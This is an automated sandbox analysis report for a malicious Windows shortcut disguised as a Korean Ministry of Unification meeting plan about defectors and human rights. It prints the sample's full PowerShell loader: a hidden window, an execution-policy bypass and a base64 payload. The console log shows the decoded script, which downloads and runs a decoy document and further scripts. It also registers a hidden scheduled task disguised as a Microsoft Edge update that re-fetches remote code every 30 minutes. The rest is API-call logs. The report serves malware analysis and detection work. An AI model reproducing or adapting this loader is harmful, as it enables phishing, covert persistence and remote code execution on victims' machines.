popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

통일부 5월 간담회 계획안(줄리 터너대사 방한건_인권 탈북).docx.lnk

Generic Malware Antivirus GIF Format Lnk Format AntiVM AntiDebug PowerShell
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6403_us Aug. 21, 2024, 3:14 p.m. Aug. 21, 2024, 3:15 p.m.
Size 310.8KB
Type MS Windows shortcut, Has Description string, Has command line arguments, Icon number=0, ctime=Sun Dec 31 15:32:08 1600, mtime=Sun Dec 31 15:32:08 1600, atime=Sun Dec 31 15:32:08 1600, length=0, window=hidenormalshowminimized
MD5 028075a00beb580aae25e2d60180889f
SHA256 1d5d65f2eb065bac629c82a3399fbdc28ebe33eb288c1cd556cca6b4e6230b52
CRC32 A65B637A
ssdeep 1536:Q8tPLPLPLPLPLPLPLPLPLPLPLPLPLPLPLPLPLPLPLPLPLPLPLPLPLPLPLPLPLPLo:2
Yara
  • Antivirus - Contains references to security software
  • lnk_file_format - Microsoft Windows Shortcut File Format
  • Lnk_Format_Zero - LNK Format

  • cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "rWzKnoaMZVOkFHg" "C:\Users\test22\AppData\Local\Temp\통일부 5월 간담회 계획안(줄리 터너대사 방한건_인권 탈북).docx.lnk"

    2004

    • powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -nop -NoProfile -NonInteractive -ExecutionPolicy Bypass -c "$ss =\"JGhoaCA9IEpvaW4tUGF0aCAoW1N5c3RlbS5JTy5QYXRoXTo6R2V0VGVtcFBhdGgoKSkgIu2GteydvOu2gCA17JuUIOqwhOuLtO2ajCDqs4Ttmo3slYgo7KSE66asIO2EsOuEiOuMgOyCrCDrsKntlZzqsbRf7J246raMIO2DiOu2gSkuZG9jeCI7IEludm9rZS1XZWJSZXF1ZXN0IC1VcmkgImh0dHA6Ly8xMjcuMC4wLjEvMDUyMS5kb2N4IiAtT3V0RmlsZSAkaGhoOyAmICRoaGg7ICRmaWxlUGF0aCA9IEpvaW4tUGF0aCAoW1N5c3RlbS5JTy5QYXRoXTo6R2V0VGVtcFBhdGgoKSkgIm1zX3VwZGF0ZS5wczEiOyAkc3RyID0gJyRhYWEgPSBKb2luLVBhdGggKFtTeXN0ZW0uSU8uUGF0aF06OkdldFRlbXBQYXRoKCkpICJ0dHQucHMxIjsgSW52b2tlLVdlYlJlcXVlc3QgLVVyaSAiaHR0cDovLzEyNy4wLjAuMi8wNTIxLXgudHh0IiAtT3V0RmlsZSAkYWFhOyAmICRhYWE7IFJlbW92ZS1JdGVtIC1QYXRoICRhYWEgLUZvcmNlOyc7ICRzdHIgfCBPdXQtRmlsZSAtRmlsZVBhdGggJGZpbGVQYXRoIC1FbmNvZGluZyBVVEY4OyAkYWN0aW9uID0gTmV3LVNjaGVkdWxlZFRhc2tBY3Rpb24gLUV4ZWN1dGUgJ1Bvd2VyU2hlbGwuZXhlJyAtQXJndW1lbnQgJy1XaW5kb3dTdHlsZSBIaWRkZW4gLW5vcCAgLU5vbkludGVyYWN0aXZlIC1Ob1Byb2ZpbGUgLUV4ZWN1dGlvblBvbGljeSBCeXBhc3MgLUNvbW1hbmQgIiYgeyRmaWxlUGF0aCA9IEpvaW4tUGF0aCAoW1N5c3RlbS5JTy5QYXRoXTo6R2V0VGVtcFBhdGgoKSkgXCJtc191cGRhdGUucHMxXCI7IHBvd2Vyc2hlbGwgLXdpbmRvd3N0eWxlIGhpZGRlbiAtRXhlY3V0aW9uUG9saWN5IEJ5cGFzcyAtRmlsZSAkZmlsZVBhdGg7fSInOyAkdHJpZ2dlciA9IE5ldy1TY2hlZHVsZWRUYXNrVHJpZ2dlciAtT25jZSAtQXQgKEdldC1EYXRlKS5BZGRNaW51dGVzKDUpIC1SZXBldGl0aW9uSW50ZXJ2YWwgKE5ldy1UaW1lU3BhbiAtTWludXRlcyAzMCk7ICRzZXR0aW5ncyA9IE5ldy1TY2hlZHVsZWRUYXNrU2V0dGluZ3NTZXQgLUhpZGRlbjsgUmVnaXN0ZXItU2NoZWR1bGVkVGFzayAtVGFza05hbWUgIk1pY3Jvc29mdEVkZ2VVcGRhdGVUYXNrTWFjaGluZVRVQUsiIC1BY3Rpb24gJGFjdGlvbiAtVHJpZ2dlciAkdHJpZ2dlciAtU2V0dGluZ3MgJHNldHRpbmdzOyAgJGFhYSA9IEpvaW4tUGF0aCAoW1N5c3RlbS5JTy5QYXRoXTo6R2V0VGVtcFBhdGgoKSkgInN3X2ZpcnN0LnBzMSI7IEludm9rZS1XZWJSZXF1ZXN0IC1VcmkgImh0dHBzOi8vMTI3LjAuMC4zLzA1MjEtZi50eHQiIC1PdXRGaWxlICRhYWE7ICYgJGFhYTsgUmVtb3ZlLUl0ZW0gLVBhdGggJGFhYSAtRm9yY2U7\"; $aa = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($ss));$cc = [System.IO.Path]::GetTempPath();$dd = \"hello9.ps1\";$ee = Join-Path $cc $dd;$aa | Out-File -FilePath $ee; $aaaaa= 89897878; powershell -windowstyle hidden -ExecutionPolicy Bypass $ee"

      2064

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
No hosts contacted.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: The term 'Invoke-WebRequest' is not recognized as the name of a cmdlet, functio
console_handle: 0x00000023
1 1 0

WriteConsoleW

 buffer: n, script file, or operable program. Check the spelling of the name, or if a pa
console_handle: 0x0000002f
1 1 0

WriteConsoleW

 buffer: th was included, verify that the path is correct and try again.
console_handle: 0x0000003b
1 1 0

WriteConsoleW

 buffer: At C:\Users\test22\AppData\Local\Temp\hello9.ps1:1 char:111
console_handle: 0x00000047
1 1 0

WriteConsoleW

 buffer: + $hhh = Join-Path ([System.IO.Path]::GetTempPath()) "통일부 5월 간담회 계획안(줄리 터너대사 방한
console_handle: 0x00000053
1 1 0

WriteConsoleW

 buffer: 건_인권 탈북).docx"; Invoke-WebRequest <<<< -Uri "http://127.0.0.1/0521.docx" -OutF
console_handle: 0x0000005f
1 1 0

WriteConsoleW

 buffer: ile $hhh; & $hhh; $filePath = Join-Path ([System.IO.Path]::GetTempPath()) "ms_u
console_handle: 0x0000006b
1 1 0

WriteConsoleW

 buffer: pdate.ps1"; $str = '$aaa = Join-Path ([System.IO.Path]::GetTempPath()) "ttt.ps1
console_handle: 0x00000077
1 1 0

WriteConsoleW

 buffer: "; Invoke-WebRequest -Uri "http://127.0.0.2/0521-x.txt" -OutFile $aaa; & $aaa;
console_handle: 0x00000083
1 1 0

WriteConsoleW

 buffer: Remove-Item -Path $aaa -Force;'; $str | Out-File -FilePath $filePath -Encoding
console_handle: 0x0000008f
1 1 0

WriteConsoleW

 buffer: UTF8; $action = New-ScheduledTaskAction -Execute 'PowerShell.exe' -Argument '-W
console_handle: 0x0000009b
1 1 0

WriteConsoleW

 buffer: indowStyle Hidden -nop -NonInteractive -NoProfile -ExecutionPolicy Bypass -Com
console_handle: 0x000000a7
1 1 0

WriteConsoleW

 buffer: mand "& {$filePath = Join-Path ([System.IO.Path]::GetTempPath()) \"ms_update.ps
console_handle: 0x000000b3
1 1 0

WriteConsoleW

 buffer: 1\"; powershell -windowstyle hidden -ExecutionPolicy Bypass -File $filePath;}"'
console_handle: 0x000000bf
1 1 0

WriteConsoleW

 buffer: ; $trigger = New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(5) -Repet
console_handle: 0x000000cb
1 1 0

WriteConsoleW

 buffer: itionInterval (New-TimeSpan -Minutes 30); $settings = New-ScheduledTaskSettings
console_handle: 0x000000d7
1 1 0

WriteConsoleW

 buffer: Set -Hidden; Register-ScheduledTask -TaskName "MicrosoftEdgeUpdateTaskMachineTU
console_handle: 0x000000e3
1 1 0

WriteConsoleW

 buffer: AK" -Action $action -Trigger $trigger -Settings $settings; $aaa = Join-Path ([
console_handle: 0x000000ef
1 1 0

WriteConsoleW

 buffer: System.IO.Path]::GetTempPath()) "sw_first.ps1"; Invoke-WebRequest -Uri "https:/
console_handle: 0x000000fb
1 1 0

WriteConsoleW

 buffer: /127.0.0.3/0521-f.txt" -OutFile $aaa; & $aaa; Remove-Item -Path $aaa -Force;
console_handle: 0x00000107
1 1 0

WriteConsoleW

 buffer: + CategoryInfo : ObjectNotFound: (Invoke-WebRequest:String) [], C
console_handle: 0x00000113
1 1 0

WriteConsoleW

 buffer: ommandNotFoundException
console_handle: 0x0000011f
1 1 0

WriteConsoleW

 buffer: + FullyQualifiedErrorId : CommandNotFoundException
console_handle: 0x0000012b
1 1 0

WriteConsoleW

 buffer: The term 'C:\Users\test22\AppData\Local\Temp\통일부 5월 간담회 계획안(줄리 터너대사 방한건_인권 탈북).
console_handle: 0x0000014b
1 1 0

WriteConsoleW

 buffer: docx' is not recognized as the name of a cmdlet, function, script file, or oper
console_handle: 0x00000157
1 1 0

WriteConsoleW

 buffer: able program. Check the spelling of the name, or if a path was included, verify
console_handle: 0x00000163
1 1 0

WriteConsoleW

 buffer: that the path is correct and try again.
console_handle: 0x0000016f
1 1 0

WriteConsoleW

 buffer: At C:\Users\test22\AppData\Local\Temp\hello9.ps1:1 char:162
console_handle: 0x0000017b
1 1 0

WriteConsoleW

 buffer: + $hhh = Join-Path ([System.IO.Path]::GetTempPath()) "통일부 5월 간담회 계획안(줄리 터너대사 방한
console_handle: 0x00000187
1 1 0

WriteConsoleW

 buffer: 건_인권 탈북).docx"; Invoke-WebRequest -Uri "http://127.0.0.1/0521.docx" -OutFile $h
console_handle: 0x00000193
1 1 0

WriteConsoleW

 buffer: hh; & <<<< $hhh; $filePath = Join-Path ([System.IO.Path]::GetTempPath()) "ms_u
console_handle: 0x0000019f
1 1 0

WriteConsoleW

 buffer: pdate.ps1"; $str = '$aaa = Join-Path ([System.IO.Path]::GetTempPath()) "ttt.ps1
console_handle: 0x000001ab
1 1 0

WriteConsoleW

 buffer: "; Invoke-WebRequest -Uri "http://127.0.0.2/0521-x.txt" -OutFile $aaa; & $aaa;
console_handle: 0x000001b7
1 1 0

WriteConsoleW

 buffer: Remove-Item -Path $aaa -Force;'; $str | Out-File -FilePath $filePath -Encoding
console_handle: 0x000001c3
1 1 0

WriteConsoleW

 buffer: UTF8; $action = New-ScheduledTaskAction -Execute 'PowerShell.exe' -Argument '-W
console_handle: 0x000001cf
1 1 0

WriteConsoleW

 buffer: indowStyle Hidden -nop -NonInteractive -NoProfile -ExecutionPolicy Bypass -Com
console_handle: 0x000001db
1 1 0

WriteConsoleW

 buffer: mand "& {$filePath = Join-Path ([System.IO.Path]::GetTempPath()) \"ms_update.ps
console_handle: 0x000001e7
1 1 0

WriteConsoleW

 buffer: 1\"; powershell -windowstyle hidden -ExecutionPolicy Bypass -File $filePath;}"'
console_handle: 0x000001f3
1 1 0

WriteConsoleW

 buffer: ; $trigger = New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(5) -Repet
console_handle: 0x000001ff
1 1 0

WriteConsoleW

 buffer: itionInterval (New-TimeSpan -Minutes 30); $settings = New-ScheduledTaskSettings
console_handle: 0x0000020b
1 1 0

WriteConsoleW

 buffer: Set -Hidden; Register-ScheduledTask -TaskName "MicrosoftEdgeUpdateTaskMachineTU
console_handle: 0x00000217
1 1 0

WriteConsoleW

 buffer: AK" -Action $action -Trigger $trigger -Settings $settings; $aaa = Join-Path ([
console_handle: 0x00000223
1 1 0

WriteConsoleW

 buffer: System.IO.Path]::GetTempPath()) "sw_first.ps1"; Invoke-WebRequest -Uri "https:/
console_handle: 0x0000022f
1 1 0

WriteConsoleW

 buffer: /127.0.0.3/0521-f.txt" -OutFile $aaa; & $aaa; Remove-Item -Path $aaa -Force;
console_handle: 0x0000023b
1 1 0

WriteConsoleW

 buffer: + CategoryInfo : ObjectNotFound: (C:\Users\test22...방한건_인권 탈북).do
console_handle: 0x00000247
1 1 0

WriteConsoleW

 buffer: cx:String) [], CommandNotFoundException
console_handle: 0x00000253
1 1 0

WriteConsoleW

 buffer: + FullyQualifiedErrorId : CommandNotFoundException
console_handle: 0x0000025f
1 1 0

WriteConsoleW

 buffer: The term 'New-ScheduledTaskAction' is not recognized as the name of a cmdlet, f
console_handle: 0x0000001b
1 1 0

WriteConsoleW

 buffer: unction, script file, or operable program. Check the spelling of the name, or i
console_handle: 0x00000027
1 1 0

WriteConsoleW

 buffer: f a path was included, verify that the path is correct and try again.
console_handle: 0x00000033
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00630310
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00630890
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00630890
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00630890
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00630d90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00630d90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00630d90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00630d90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00630d90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00630d90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00630890
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00630890
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00630890
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006305d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006305d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006305d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00630250
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006305d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006305d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006305d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006305d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006305d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006305d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006305d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006307d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006307d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006307d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006307d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006307d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006307d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006307d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006307d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006307d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006307d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006307d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006307d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006307d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006307d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006d85e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006d85e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006d85e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006d85e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006d85e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006d85e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006d85e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0032aba8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0032ace8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0032ace8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0032ace8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0032a468
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2064
region_size: 1703936
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02720000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2064
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02880000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2064
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72fd1000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2064
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0247a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2064
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72fd2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2064
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02472000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2064
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02482000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2064
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02881000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2064
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02882000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2064
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024aa000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2064
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02483000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2064
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02484000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2064
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024bb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2064
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024b7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2064
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0247b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2064
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024a2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2064
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024b5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2064
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02485000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2064
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024ac000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2064
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02860000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2064
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02486000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2064
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024bc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2064
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024a3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2064
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024a4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2064
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024a5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2064
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024a6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2064
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024a7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2064
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024a8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2064
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024a9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2064
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
